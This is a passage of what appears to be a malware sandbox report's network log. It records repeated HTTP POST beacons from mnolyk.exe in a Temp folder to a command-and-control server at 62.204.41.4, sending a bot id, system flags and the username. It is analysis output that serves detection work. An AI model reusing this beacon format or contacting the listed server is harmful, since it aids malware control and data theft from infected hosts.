                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.512262106 CET448INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      334192.168.2.75002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:31.679572105 CET449OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.742604971 CET449INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      335192.168.2.75003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:31.914465904 CET450OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:31.978188992 CET450INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      336192.168.2.75003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:32.148799896 CET451OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.213572025 CET451INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      337192.168.2.75003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:32.408441067 CET452OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.471019030 CET452INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      338192.168.2.75003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:32.657521009 CET453OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.720254898 CET453INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      339192.168.2.75003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:32.903822899 CET454OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:32.967792988 CET454INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      34192.168.2.74972862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:09.767108917 CET138OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:09.831113100 CET138INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:09 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      340192.168.2.75003562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:33.151525021 CET455OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.214391947 CET455INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      341192.168.2.75003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:33.388753891 CET456OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.453290939 CET456INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      342192.168.2.75003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:33.640086889 CET457OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:33.705540895 CET457INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      343192.168.2.75003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:34.135274887 CET458OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:34.198477983 CET458INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      344192.168.2.75003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:34.413705111 CET459OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:34.476334095 CET459INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      345192.168.2.75004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:35.106091976 CET460OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:35.169405937 CET460INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      346192.168.2.75004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:35.406745911 CET461OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:35.470330954 CET461INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      347192.168.2.75004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:36.263611078 CET462OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:36.325232983 CET462INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      348192.168.2.75004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:36.948525906 CET463OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.014750957 CET463INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      349192.168.2.75004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:37.214832067 CET464OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.280854940 CET464INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      35192.168.2.74972962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:10.061029911 CET139OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:10.126115084 CET139INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:10 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      350192.168.2.75004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:37.461652040 CET465OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:37.524796009 CET465INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
